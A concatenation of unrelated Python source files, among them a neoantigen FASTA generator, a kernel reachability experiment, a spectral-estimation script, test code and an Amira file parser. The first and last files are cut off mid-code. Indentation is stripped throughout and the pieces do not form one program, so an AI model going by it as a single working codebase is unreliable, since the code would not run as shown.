return wildtype_subsequence, mutant_subsequence, left_flanking_sequence
def add_proximal_variants(self, somatic_variant_index, wildtype_subsequence, mutation_position, original_position, germline_variants_only):
mutation_offset = original_position - mutation_position
wildtype_subsequence_with_proximal_variants = wildtype_subsequence
if somatic_variant_index in self.proximal_variants.keys():
for (protein_position, lines) in self.proximal_variants[somatic_variant_index].items():
if protein_position == original_position:
continue
if germline_variants_only:
filtered_lines = [line for line in lines if line['type'] == 'germline']
else:
filtered_lines = lines
if len(filtered_lines) == 0:
continue
elif len(filtered_lines) == 1:
line = filtered_lines[0]
proximal_variant_wildtype_amino_acid, proximal_variant_mutant_amino_acid = line['amino_acid_change'].split('/')
else:
line = filtered_lines[0]
proximal_variant_wildtype_amino_acid = line['amino_acid_change'].split('/')[0]
codon_changes = [ item['codon_change'] for item in filtered_lines ]
proximal_variant_mutant_amino_acid = ProximalVariant.combine_conflicting_variants(codon_changes)
proximal_variant_position = int(protein_position) - 1 - mutation_offset
if proximal_variant_position <= 0 or proximal_variant_position >= len(wildtype_subsequence):
continue
if len(proximal_variant_wildtype_amino_acid) != len(proximal_variant_mutant_amino_acid):
print("Nearby variant is not a missense mutation. Skipping.")
continue
if wildtype_subsequence[proximal_variant_position] != proximal_variant_wildtype_amino_acid:
sys.exit(
"Error when processing proximal variant.\n" +
"The wildtype amino acid for variant %s with substring %s is different than expected.\n" % (somatic_variant_index, wildtype_subsequence) +
"Actual wildtype amino acid: %s\n" % wildtype_subsequence[proximal_variant_position] +
"Wildtype amino acid of the proximal_variant: %s" % proximal_variant_wildtype_amino_acid
)
wildtype_subsequence_with_proximal_variants = wildtype_subsequence_with_proximal_variants[:proximal_variant_position] + proximal_variant_mutant_amino_acid + wildtype_subsequence_with_proximal_variants[proximal_variant_position+1:]
return wildtype_subsequence_with_proximal_variants
def execute(self):
reader = open(self.input_file, 'r')
tsvin = csv.DictReader(reader, delimiter='\t')
fasta_sequences = OrderedDict()
for line in tsvin:
variant_type = line['variant_type']
full_wildtype_sequence = line['wildtype_amino_acid_sequence']
if variant_type == 'FS':
position = int(line['protein_position'].split('-', 1)[0]) - 1
elif variant_type == 'missense' or variant_type == 'inframe_ins':
if '/' not in line['amino_acid_change']:
continue
wildtype_amino_acid, mutant_amino_acid = line['amino_acid_change'].split('/')
if '*' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('*')[0]
elif 'X' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('X')[0]
if '*' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('*')[0]
stop_codon_added = True
elif 'X' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('X')[0]
stop_codon_added = True
else:
stop_codon_added = False
if wildtype_amino_acid == '-':
position = int(line['protein_position'].split('-', 1)[0])
wildtype_amino_acid_length = 0
else:
if '-' in line['protein_position']:
position = int(line['protein_position'].split('-', 1)[0]) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
else:
position = int(line['protein_position']) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
elif variant_type == 'inframe_del':
variant_type = 'inframe_del'
wildtype_amino_acid, mutant_amino_acid = line['amino_acid_change'].split('/')
if '*' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('*')[0]
elif 'X' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('X')[0]
if '*' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('*')[0]
stop_codon_added = True
elif 'X' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('X')[0]
stop_codon_added = True
else:
stop_codon_added = False
position = int(line['protein_position'].split('-', 1)[0]) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
if mutant_amino_acid == '-':
mutant_amino_acid = ''
else:
continue
if self.position_out_of_bounds(position, full_wildtype_sequence):
continue
if variant_type == 'missense' and line['index'] in self.proximal_variants and line['protein_position'] in self.proximal_variants[line['index']]:
codon_changes = [ item['codon_change'] for item in self.proximal_variants[line['index']][line['protein_position']] ]
codon_changes.append(line['codon_change'])
mutant_amino_acid_with_proximal_variants = ProximalVariant.combine_conflicting_variants(codon_changes)
elif variant_type != 'FS':
mutant_amino_acid_with_proximal_variants = mutant_amino_acid
if variant_type == 'FS':
full_mutant_sequence = line['frameshift_amino_acid_sequence']
wildtype_subsequence, mutant_subsequence, left_flanking_subsequence = self.get_frameshift_subsequences(position, full_wildtype_sequence, full_mutant_sequence)
mutation_start_position = len(left_flanking_subsequence)
wildtype_subsequence = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, True)
left_flanking_subsequence_with_proximal_variants = self.add_proximal_variants(line['index'], left_flanking_subsequence, mutation_start_position, position, False)
#The caveat here is that if a nearby variant is in the downstream sequence, the protein sequence would be further altered, which we aren't taking into account.
#we would need to recalculate the downstream protein sequence taking all downstream variants into account.
mutant_subsequence = re.sub('^%s' % left_flanking_subsequence, left_flanking_subsequence_with_proximal_variants, mutant_subsequence)
else:
mutation_start_position, wildtype_subsequence = self.get_wildtype_subsequence(position, full_wildtype_sequence, wildtype_amino_acid_length, line)
mutation_end_position = mutation_start_position + wildtype_amino_acid_length
if wildtype_amino_acid != '-' and wildtype_amino_acid != wildtype_subsequence[mutation_start_position:mutation_end_position]:
if line['amino_acid_change'].split('/')[0].count('*') > 1:
print("Warning: Amino acid change is not sane - contains multiple stops. Skipping entry {}".format(line['index']))
continue
else:
sys.exit("ERROR: There was a mismatch between the actual wildtype amino acid sequence ({}) and the expected amino acid sequence ({}). Did you use the same reference build version for VEP that you used for creating the VCF?\n{}".format(wildtype_subsequence[mutation_start_position:mutation_end_position], wildtype_amino_acid, line))
wildtype_subsequence_with_proximal_variants = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, False)
wildtype_subsequence = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, True)
if stop_codon_added:
mutant_subsequence = wildtype_subsequence_with_proximal_variants[:mutation_start_position] + mutant_amino_acid_with_proximal_variants
else:
mutant_subsequence = wildtype_subsequence_with_proximal_variants[:mutation_start_position] + mutant_amino_acid_with_proximal_variants + wildtype_subsequence_with_proximal_variants[mutation_end_position:]
if '*' in wildtype_subsequence or '*' in mutant_subsequence:
continue
if 'X' in wildtype_subsequence or 'X' in mutant_subsequence:
continue
if 'U' in wildtype_subsequence or 'U' in mutant_subsequence:
print("Warning. Sequence contains unsupported amino acid U. Skipping entry {}".format(line['index']))
continue
if mutant_subsequence in wildtype_subsequence:
#This is not a novel peptide
continue
if len(wildtype_subsequence) < self.epitope_length or len(mutant_subsequence) < self.epitope_length:
continue
variant_id = line['index']
for designation, subsequence in zip(['WT', 'MT'], [wildtype_subsequence, mutant_subsequence]):
key = '%s.%s' % (designation, variant_id)
fasta_sequences.setdefault(subsequence, []).append(key)
writer = open(self.output_file, 'w')
key_writer = open(self.output_key_file, 'w')
count = 1
for (subsequence, keys) in fasta_sequences.items():
writer.writelines('>%s\n' % count)
writer.writelines('%s\n' % subsequence)
yaml.dump({count: keys}, key_writer, default_flow_style=False)
count += 1
reader.close()
writer.close()
key_writer.close()
class FusionFastaGenerator(FastaGenerator):
def execute(self):
reader = open(self.input_file, 'r')
tsvin = csv.DictReader(reader, delimiter='\t')
fasta_sequences = OrderedDict()
for line in tsvin:
variant_type = line['variant_type']
position = int(line['protein_position'])
sequence = line['fusion_amino_acid_sequence']
if position < self.flanking_sequence_length:
start_position = 0
else:
start_position = position - self.flanking_sequence_length
if variant_type == 'inframe_fusion':
stop_position = position + self.flanking_sequence_length
subsequence = sequence[start_position:stop_position]
elif variant_type == 'frameshift_fusion':
if self.downstream_sequence_length:
stop_position = position + self.downstream_sequence_length
subsequence = sequence[start_position:stop_position]
else:
subsequence = sequence[start_position:]
else:
continue
if subsequence.endswith('X'):
subsequence = subsequence[:-1]
if '*' in subsequence:
continue
if 'X' in subsequence:
continue
if len(subsequence) < self.epitope_length:
continue
fasta_sequences.setdefault(subsequence, []).append(line['index'])
writer = open(self.output_file, 'w')
key_writer = open(self.output_key_file, 'w')
count = 1
for (subsequence, keys) in fasta_sequences.items():
writer.writelines('>%s\n' % count)
writer.writelines('%s\n' % subsequence)
yaml.dump({count: keys}, key_writer, default_flow_style=False)
count += 1
reader.close()
writer.close()
key_writer.close()
class VectorFastaGenerator():
def __init__(self, **kwargs):
self.input_file = kwargs['input_file']
self.output_file_prefix = kwargs['output_file_prefix']
self.epitope_lengths = kwargs['epitope_lengths']
self.spacers = kwargs['spacers']
def execute(self):
seq_dict = dict()
for record in SeqIO.parse(self.input_file, "fasta"):
data = {'seq': str(record.seq)}
if record.id != record.description:
data.update(json.loads(record.description.split(' ', 1)[1]))
contains_problematic_peptides = True
else:
contains_problematic_peptides = False
seq_dict[record.id] = data
seq_keys = sorted(seq_dict)
if contains_problematic_peptides:
seq_tuples = self.combine_problematic_peptides(seq_dict)
else:
seq_tuples = list(itertools.permutations(seq_keys, 2))
for length in self.epitope_lengths:
epitopes = dict()
fasta_sequences = OrderedDict()
wingspan_length = length - 1
for comb in seq_tuples:
seq1 = comb[0]
seq2 = comb[1]
seq1_seq = seq_dict[seq1]['seq']
seq2_seq = seq_dict[seq2]['seq']
trunc_seq1 = seq1_seq[(len(seq1_seq) - wingspan_length):len(seq1_seq)]
trunc_seq2 = seq2_seq[0:wingspan_length]
for this_spacer in self.spacers:
if this_spacer != 'None':
seq_ID = seq1 + "|" + this_spacer + "|" + seq2
epitopes[seq_ID] = (trunc_seq1 + this_spacer + trunc_seq2)
else:
seq_ID = seq1 + "|" + seq2
epitopes[seq_ID] = trunc_seq1 + trunc_seq2
for seq_id in epitopes:
sequence = epitopes[seq_id]
if len(sequence) < length:
continue
fasta_sequences.setdefault(sequence, []).append(seq_id)
output_file = "{}.{}.tsv".format(self.output_file_prefix, length)
output_key_file = "{}.key".format(output_file)
writer = open(output_file, 'w')
key_writer = open(output_key_file, 'w')
count = 1
for (subsequence, keys) in sorted(fasta_sequences.items()):
writer.writelines('>%s\n' % count)
writer.writelines('%s\n' % subsequence)
yaml.dump({count: keys}, key_writer, default_flow_style=False)
count += 1
writer.close()
key_writer.close()
def combine_problematic_peptides(self, seq_dict):
seq_tuples = []
for (seq_id, data) in seq_dict.items():
other_seq_ids = list(seq_dict.keys())
other_seq_ids.remove(seq_id)
if data['problematic_start']:
for other_seq_id in other_seq_ids:
seq_tuples.append((other_seq_id, seq_id))
if data['problematic_end']:
for other_seq_id in other_seq_ids:
seq_tuples.append((seq_id, other_seq_id))
return list(set(seq_tuples))
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #9 $
#
# If the resource group defines one or more AWS Lambda Function resources, you can put
# the code that implements the functions below. The Handler property of the Lambda
# Function resource definition in the groups's resource-template.json file identifies
# the Python function that is called when the Lambda Function is execution. To call
# a function here in main.py, set the Handler property to "main.FUNCTION_NAME".
#
# IMPORTANT: If the game executes the Lambda Function (which is often the case), then
# you must configure player access for the Lambda Function. This is done by including
# the CloudCanvas Permission metadata on the Lambda Function resource definition.
#
import boto3 # Python AWS API
import CloudCanvas # Access Settings using get_setting("SETTING_NAME")
# Setting values come from the Settings property of the AWS Lambda Function's
# configuration resource definition in the resource groups's resource-template.json
# file.
#
# You can use settings to pass resource template parameter values to the Lambda
# Function. The template parameter's default values can be overriden using the
# project project-settings.json file. You can provide different parameter values
# for each deployment.
#
# You can also use settings to pass a resource's physical id to the Lambda Function.
# The Lambda Function code can use the pyhsical id to access the AWS resource using
# the boto3 api.
|
import numpy as np
from sacred import Experiment
from sacred import Ingredient
from time import perf_counter
from functools import lru_cache
from functools import partial
from gym.spaces import Box
from gym_socks.envs.integrator import NDIntegratorEnv
from gym_socks.sampling import random_sampler
from gym_socks.sampling import sample
from gym_socks.sampling import default_sampler
from gym_socks.algorithms.reach import kernel_sr
from sklearn.metrics.pairwise import rbf_kernel
ex = Experiment()
@ex.config
def ex_config():
dimensionality = 2
time_horizon = 10
sample_size = 1000
test_sample_size = 1000
problem = "THT"
regularization_param = 1
sigma = 0.1
@lru_cache(maxsize=1)
@ex.capture
def generate_dataset(env, sample_size):
"""Generate the sample (dataset) for the experiment."""
sample_space = Box(
low=-1.1,
high=1.1,
shape=env.state_space.shape,
dtype=env.state_space.dtype,
)
state_sampler = random_sampler(sample_space=sample_space)
action_sampler = random_sampler(sample_space=env.action_space)
S = sample(
sampler=default_sampler(
state_sampler=state_sampler, action_sampler=action_sampler, env=env
),
sample_size=sample_size,
)
return S
@lru_cache(maxsize=1)
@ex.capture
def generate_test_dataset(env, test_sample_size):
"""Generate the test dataset."""
sample_space = Box(
low=-1,
high=1,
shape=env.state_space.shape,
dtype=env.state_space.dtype,
)
T = sample(
sampler=random_sampler,
sample_size=test_sample_size,
sample_space=sample_space,
)
return T
def generate_constraint_tube(env, time_horizon):
"""Generate the constraint tube."""
constraint_tube = [
Box(
low=-1,
high=1,
shape=env.state_space.shape,
dtype=env.state_space.dtype,
)
] * time_horizon
return constraint_tube
def generate_target_tube(env, time_horizon):
"""Generate the target tube."""
target_tube = [
Box(
low=-0.5,
high=0.5,
shape=env.state_space.shape,
dtype=env.state_space.dtype,
)
] * time_horizon
return target_tube
@ex.main
def main(
dimensionality,
time_horizon,
sample_size,
test_sample_size,
problem,
regularization_param,
sigma,
):
env = NDIntegratorEnv(dim=dimensionality)
S = generate_dataset(env, sample_size)
T = generate_test_dataset(env, test_sample_size)
start_time = perf_counter()
# Algorithm setup.
constraint_tube = generate_constraint_tube(env, time_horizon)
target_tube = generate_target_tube(env, time_horizon)
# Main algorithm.
kernel_sr(
S=S,
T=T,
time_horizon=time_horizon,
constraint_tube=constraint_tube,
target_tube=target_tube,
problem=problem,
regularization_param=regularization_param,
kernel_fn=partial(rbf_kernel, gamma=1 / (2 * (sigma ** 2))),
verbose=False,
)
elapsed_time = perf_counter() - start_time
return elapsed_time
if __name__ == "__main__":
ex.run_commandline()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 18:20:39 2019
@author: nico
"""
import sys
sys.path.append('/home/nico/Documentos/facultad/6to_nivel/pds/git/pdstestbench')
from spectrum import CORRELOGRAMPSD
import os
import matplotlib.pyplot as plt
import numpy as np
from scipy.fftpack import fft
import pandas as pd
os.system ("clear") # limpia la terminal de python
plt.close("all") #cierra todos los graficos
# Simular para los siguientes tamaños de señal
N = 1000
Nexp = 200
fs = 2*np.pi # Hz
df = fs/N
f0 = np.pi / 2
M = 100
mu = 0 # media (mu)
var = 2 # varianza
SNR = [-15, -8] #db
a1 = 2*np.sqrt(var)*pow(10,SNR[0]/20)
a2 = 2*np.sqrt(var)*pow(10,SNR[1]/20)
a = (-1/2) *df
b = (1/2) * df
#%% generación de frecuencias aleatorias
fa = np.random.uniform(a, b, size = (Nexp)) # genera aleatorios
f1 = f0 + fa
plt.hist(fa, bins=10, alpha=1, edgecolor = 'black', linewidth=1)
plt.ylabel('frequencia')
plt.xlabel('valores')
plt.title('Histograma Uniforme')
plt.savefig("Histograma.png")
plt.show()
del fa
#%% generación de señales
noise= np.vstack(np.transpose([ np.random.normal(0, np.sqrt(var), N) for j in range(Nexp)]))
fftnoise = 10*np.log10(np.abs(fft(noise, axis=0)/N)**2)
#%% Gráficos de la PSD
jj = np.linspace(0, (N-1)*df, N)
plt.figure("PSD ruido", constrained_layout=True)
plt.title("PSD ruido")
plt.plot(jj, fftnoise, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()
#%% generación de señales
tt = np.linspace(0, (N-1)/fs, N)
senoidal1 = np.vstack(np.transpose([a1 * np.sin(2*np.pi*j*tt) for j in f1]))
senoidal2 = np.vstack(np.transpose([a2 * np.sin(2*np.pi*j*tt) for j in f1]))
del tt
signal1 = senoidal1 + noise
signal2 = senoidal2 + noise
S_BT1 = np.vstack(np.transpose([CORRELOGRAMPSD(signal1[:,ii],window='bartlett', lag=M, NFFT=N) for ii in range(Nexp)]))
S_BT1 = 10*np.log10(S_BT1 *2/N)
S_BT2 = np.vstack(np.transpose([CORRELOGRAMPSD(signal2[:,ii],window='bartlett', lag=M, NFFT=N) for ii in range(Nexp)]))
S_BT2 = 10*np.log10(S_BT2 *2/N)
freq_hat1 = np.argmax(S_BT1[:int(N/2)-1,:], axis=0)*df # estimo la frecuecnia
freq_hat2 = np.argmax(S_BT2[:int(N/2)-1,:], axis=0)*df # estimo la frecuecnia
error_freq1 = np.abs(freq_hat1 - f1)/f1 # calculo el error absoluto
error_freq2 = np.abs(freq_hat2 - f1)/f1 # calculo el error absoluto
error_medio1 = np.mean(error_freq1)
error_medio2 = np.mean(error_freq2)
varianza1_BT = np.var(error_freq1)
varianza2_BT = np.var(error_freq2)
#%% Gráficos de la PSD
ff = np.linspace(0, (N-1)*df, N)
plt.figure("PSD con a1 = 3dB", constrained_layout=True)
plt.title("PSD con a1 = 3dB")
plt.plot(ff, S_BT1, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()
# Gráfico del error absoluto
plt.figure("Error al estimar la frecuencia con a1 = 3dB", constrained_layout=True)
plt.title("Error al estimar la frecuencia con a1 = 3dB")
plt.plot(f1, error_freq1,'*r')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Error relativo")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.xlim((min(f1), max(f1)))
plt.grid()
plt.figure("PSD con a1 = 10dB", constrained_layout=True)
plt.title("PSD con a1 = 10dB")
plt.plot(ff, S_BT2, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()
# Gráfico del error absoluto
plt.figure("Error al estimar la frecuencia con a1 = 10dB", constrained_layout=True)
plt.title("Error al estimar la frecuencia con a1 = 10dB")
plt.plot(f1, error_freq2,'*r')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Error relativo")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.xlim((min(f1), max(f1)))
plt.grid()
|
from .connection import GibsonConnection, create_connection
from .errors import (GibsonError, ProtocolError, ReplyError,
ExpectedANumber, MemoryLimitError, KeyLockedError)
from .pool import GibsonPool, create_pool, create_gibson
__version__ = '0.1.3'
# make pyflakes happy
(GibsonConnection, create_connection, GibsonError, ProtocolError, ReplyError,
ExpectedANumber, MemoryLimitError, KeyLockedError, GibsonPool,
create_pool, create_gibson)
|
from .metadata import Metadata
from . import errors
class Check(Metadata):
"""Check representation.
API | Usage
-------- | --------
Public | `from frictionless import Checks`
It's an interface for writing Frictionless checks.
Parameters:
descriptor? (str|dict): schema descriptor
Raises:
FrictionlessException: raise if metadata is invalid
"""
code = "check"
Errors = [] # type: ignore
def __init__(self, descriptor=None, *, function=None):
super().__init__(descriptor)
self.setinitial("code", self.code)
self.__function = function
@property
def resource(self):
"""
Returns:
Resource?: resource object available after the `check.connect` call
"""
return self.__resource
def connect(self, resource):
"""Connect to the given resource
Parameters:
resource (Resource): data resource
"""
self.__resource = resource
# Validate
def validate_start(self):
"""Called to validate the resource after opening
Yields:
Error: found errors
"""
yield from []
def validate_row(self, row):
"""Called to validate the given row (on every row)
Parameters:
row (Row): table row
Yields:
Error: found errors
"""
yield from self.__function(row) if self.__function else []
def validate_end(self):
"""Called to validate the resource before closing
Yields:
Error: found errors
"""
yield from []
# Metadata
metadata_Error = errors.CheckError
|
import tempfile
import pytest
from unittest import mock
from blaze.chrome.har import har_from_json
from blaze.command.manifest import view_manifest
from blaze.config.environment import EnvironmentConfig
from blaze.preprocess.har import har_entries_to_resources
from blaze.preprocess.resource import resource_list_to_push_groups
from blaze.preprocess.url import Url
from tests.mocks.har import get_har_json
class TestViewManifest:
def test_view_manifest_exits_with_missing_arguments(self):
with pytest.raises(SystemExit):
view_manifest([])
def test_view_manifest(self):
har = har_from_json(get_har_json())
res_list = har_entries_to_resources(har)
push_groups = resource_list_to_push_groups(res_list)
config = EnvironmentConfig(
replay_dir="", request_url="https://www.reddit.com/", push_groups=push_groups, har_resources=res_list
)
with mock.patch("builtins.print") as mock_print:
with tempfile.NamedTemporaryFile() as config_file:
config.save_file(config_file.name)
view_manifest([config_file.name])
assert mock_print.call_count > 5
printed_text = "\n".join(call[0][0] for call in mock_print.call_args_list if call[0])
assert config.replay_dir in printed_text
assert config.request_url in printed_text
assert all(group.name in printed_text for group in config.push_groups)
assert all(
Url.parse(res.url).resource[:61] in printed_text for group in config.push_groups for res in group.resources
)
def test_view_manifest_only_trainable(self):
json = get_har_json()
har = har_from_json(json)
res_list = har_entries_to_resources(har)
push_groups = resource_list_to_push_groups(res_list, train_domain_globs=["*reddit.com"])
config = EnvironmentConfig(
replay_dir="", request_url="https://www.reddit.com/", push_groups=push_groups, har_resources=res_list
)
with mock.patch("builtins.print") as mock_print:
with tempfile.NamedTemporaryFile() as config_file:
config.save_file(config_file.name)
view_manifest(["--trainable", config_file.name])
assert mock_print.call_count > 5
printed_text = "\n".join(call[0][0] for call in mock_print.call_args_list if call[0])
assert config.replay_dir in printed_text
assert config.request_url in printed_text
assert all(group.name in printed_text for group in config.push_groups if group.trainable)
pre_graph_text = printed_text.split("Execution Graph")[0]
assert not any(group.name in pre_graph_text for group in config.push_groups if not group.trainable)
|
# -*- coding: utf-8 -*-
"""
data_stream
===========
Classes that define data streams (DataList) in Amira (R) files
There are two main types of data streams:
* `AmiraMeshDataStream` is for `AmiraMesh` files
* `AmiraHxSurfaceDataStream` is for `HxSurface` files
Both classes inherit from `AmiraDataStream` class, which handles common functionality such as:
* initialisation with the header metadata
* the `get_data` method calls each subclass's `_decode` method
"""
from __future__ import print_function
import re
import sys
# todo: remove as soon as DataStreams class is removed
import warnings
import zlib
import numpy as np
from .core import _dict_iter_keys, _dict_iter_values, ListBlock, deprecated
from .grammar import _hyper_surface_file
# definition of numpy data types with dedicated endianess and number of bits
# they are used by the below lookup table
_np_ubytebig = np.dtype(np.uint8).newbyteorder('>')
_np_ubytelittle = np.dtype(np.uint8).newbyteorder('<')
_np_bytebig = np.dtype(np.int8).newbyteorder('>')
_np_bytelittle = np.dtype(np.int8).newbyteorder('<')
_np_shortlittle = np.dtype(np.int16).newbyteorder('<')
_np_shortbig = np.dtype(np.int16).newbyteorder('>')
_np_ushortlittle = np.dtype(np.uint16).newbyteorder('<')
_np_ushortbig = np.dtype(np.uint16).newbyteorder('>')
_np_intlittle = np.dtype(np.int32).newbyteorder('<')
_np_intbig = np.dtype(np.int32).newbyteorder('>')
_np_uintlittle = np.dtype(np.uint32).newbyteorder('<')
_np_uintbig = np.dtype(np.uint32).newbyteorder('>')
_np_longlittle = np.dtype(np.int64).newbyteorder('<')
_np_longbig = np.dtype(np.int64).newbyteorder('>')
_np_ulonglittle = np.dtype(np.uint64).newbyteorder('<')
_np_ulongbig = np.dtype(np.uint64).newbyteorder('>')
_np_floatbig = np.dtype(np.float32).newbyteorder('>')
_np_floatlittle = np.dtype(np.float32).newbyteorder('<')
_np_doublebig = np.dtype(np.float64).newbyteorder('>')
_np_doublelittle = np.dtype(np.float64).newbyteorder('<')
_np_complexbig = np.dtype(np.complex64).newbyteorder('>')
_np_complexlittle = np.dtype(np.complex64).newbyteorder('<')
_np_char = np.dtype(np.string_)
"""
lookuptable of the different data types occurring within
AmiraMesh and HyperSurface files grouped by their endianess
which is defined according to Amira Referenceguide [1] as follows
* BINARY: for bigendian encoded streams,
* BINARY-LITTLE-ENDIAN: for little endian encoded streams and
* ASCII: for human readable encoded data
The lookup table is split into three sections:
* True: for all littleendian data types
* False: for all bigendian data types and
* the direct section mapping to the default numpy types for
reading ASCII encoded data which have no specific endianness besides the
bigendian characteristic intrinsic to decimal numbers.
[1] pp 519-525 # downloaded Dezember 2018 from
http://www1.udel.edu/ctcr/sites/udel.edu.ctcr/files/Amira%20Reference%20Guide.pdf
"""
_type_map = {
True: {
'byte': _np_ubytelittle,
'ubyte': _np_ubytelittle,
'short': _np_shortlittle,
'ushort': _np_ushortlittle,
'int': _np_intlittle,
'uint': _np_uintlittle,
'long': _np_longlittle,
'ulong': _np_ulonglittle,
'uint64': _np_ulonglittle,
'float': _np_floatlittle,
'double': _np_doublelittle,
'complex': _np_complexlittle,
'char': _np_char,
'string': _np_char,
'ascii': _np_char
},
False: {
'byte': _np_ubytebig,
'ubyte': _np_ubytebig,
'short': _np_shortbig,
'ushort': _np_ushortbig,
'int': _np_intbig,
'uint': _np_uintbig,
'long': _np_longbig,
'ulong': _np_ulongbig,
'uint64': _np_ulongbig,
'float': _np_floatbig,
'double': _np_doublebig,
'complex': _np_complexbig,
'char': _np_char,
'string': _np_char,
'ascii': _np_char
},
'byte': np.dtype(np.int8),
'ubyte': np.dtype(np.uint8),
'short': np.dtype(np.int16),
'ushort': np.dtype(np.uint16),
'int': np.dtype(np.int32),
'uint': np.dtype(np.uint32),
'long': np.dtype(np.int64),
'ulong': np.dtype(np.uint64),
'uint64': np.dtype(np.uint64),
'float': np.dtype(np.float32),
'double': np.dtype(np.float64),
'complex': np.dtype(np.complex64),
'char': _np_char,
'string': _np_char,
'ascii': _np_char
}
# try to import native byterele_decoder binary and fallback to python implementation
try:
# if import failed for whatever reason
if sys.version_info[0] > 2:
from ahds.decoders import byterle_decoder
else:
from .decoders import byterle_decoder
except ImportError:
def byterle_decoder(data, output_size):
"""If the C-ext. failed to compile or is unimportable use this slower Python equivalent
:param str data: a raw stream of data to be unpacked
:param int output_size: the number of items when ``data`` is uncompressed
:return np.array output: an array of ``np.uint8``
"""
from warnings import warn
warn("using pure-Python (instead of Python C-extension) implementation of byterle_decoder")
input_data = np.frombuffer(data, dtype=_np_ubytelittle, count=len(data))
output = np.zeros(output_size, dtype=np.uint8)
i = 0
count = True
repeat = False
no = None
j = 0
while i < len(input_data):
if count:
no = input_data[i]
if no > 127:
no &= 0x7f # 2's complement
count = False
repeat = True
i += 1
continue
else:
i += 1
count = False
repeat = False
continue
elif not count:
if repeat:
# value = input_data[i:i + no]
repeat = False
count = True
# output[j:j+no] = np.array(value)
output[j:j + no] = input_data[i:i + no]
i += no
j += no
continue
elif not repeat:
# value = input_data[i]
# output[j:j+no] = value
output[j:j + no] = input_data[i]
i += 1
j += no
count = True
repeat = False
continue
assert j == output_size
return output
# define common alias for the selected byterle_decoder implementation
hxbyterle_decode = byterle_decoder
def hxzip_decode(data, output_size):
"""Decode HxZip data stream
:param str data: a raw stream of data to be unpacked
:param int output_size: the number of items when ``data`` is uncompressed
:return np.array output: an array of ``np.uint8``
"""
return np.frombuffer(zlib.decompress(data), dtype=_np_ubytelittle, count=output_size)
def set_data_stream(name, header):
"""Factory function used by AmiraHeader to determine the type of data stream present"""
if header.filetype == 'AmiraMesh':
return AmiraMeshDataStream(name, header)
elif header.filetype == 'HyperSurface':
return AmiraHxSurfaceDataStream(name, header)
class AmiraDataStream(ListBlock):
""""""
__slots__ = ('_stream_data', '_header')
def __init__(self, name, header):
self._header = header # contains metadata for extracting streams
self._stream_data = None
super(AmiraDataStream, self).__init__(name)
@property
def load_stream(self):
"""Reports whether data streams are loaded or not"""
return self._header.load_streams
def get_data(self):
"""Decode and return the stream data in this stream"""
try:
assert len(self._stream_data) > 0
except AssertionError:
raise ValueError('empty stream found')
return self._decode(self._stream_data)
class AmiraMeshDataStream(AmiraDataStream):
"""Class that defines an AmiraMesh data stream"""
def read(self):
"""Extract the data streams from the AmiraMesh file"""
with open(self._header.filename, 'rb') as f:
# rewind the file pointer to the end of the header
f.seek(len(self._header))
start = int(self.data_index) # this data streams index
end = start + 1
if self._header.data_stream_count == start: # this is the last stream
data = f.read()
_regex = ".*?\n@{}\n(?P<stream>.*)\n".format(start).encode('ASCII')
regex = re.compile(_regex, re.S)
match = regex.match(data)
_stream_data = match.group('stream')
self._stream_data = _stream_data[:-1] if _stream_data[-1] == 10 else _stream_data
else:
data = f.read()
_regex = ".*?\n@{}\n(?P<stream>.*)\n@{}\n".format(start, end).encode('ASCII')
regex = re.compile(_regex, re.S)
match = regex.match(data)
self._stream_data = match.group('stream')
def _decode(self, data):
"""Performs data stream decoding by introspecting the header information"""
# determine the new output shape
# take into account shape and dimension
if isinstance(self.shape, tuple):
if self.dimension > 1:
new_shape = tuple(list(self.shape) + [self.dimension])
else:
new_shape = (self.shape, )
elif isinstance(self.shape, int):
if self.dimension > 1:
new_shape = tuple([self.shape, self.dimension])
else:
new_shape = (self.shape, )
# first we handle binary files
# NOTE ON HOW LATTICES ARE STORED
# AmiraMesh files state the dimensions of the lattice as nx, ny, nz
# The data is stored such that the first value has index (0, 0, 0) then
# (1, 0, 0), ..., (nx-1, 0, 0), (0, 1, 0), (1, 1, 0), ..., (nx-1, 1, 0)
# In other words, the first index changes fastest.
# The last index is thus the stack index
# (see pg. 720 of https://assets.thermofisher.com/TFS-Assets/MSD/Product-Guides/user-guide-amira-software.pdf
if self._header.format == 'BINARY':
# _type_map[endianness] uses endianness = True for endian == 'LITTLE'
is_little_endian = self._header.endian == 'LITTLE'
if self.format is None:
return np.frombuffer(
data,
dtype=_type_map[is_little_endian][self.type]
).reshape(*new_shape)
elif self.format == 'HxZip':
return np.frombuffer(
zlib.decompress(data),
dtype=_type_map[is_little_endian][self.type]
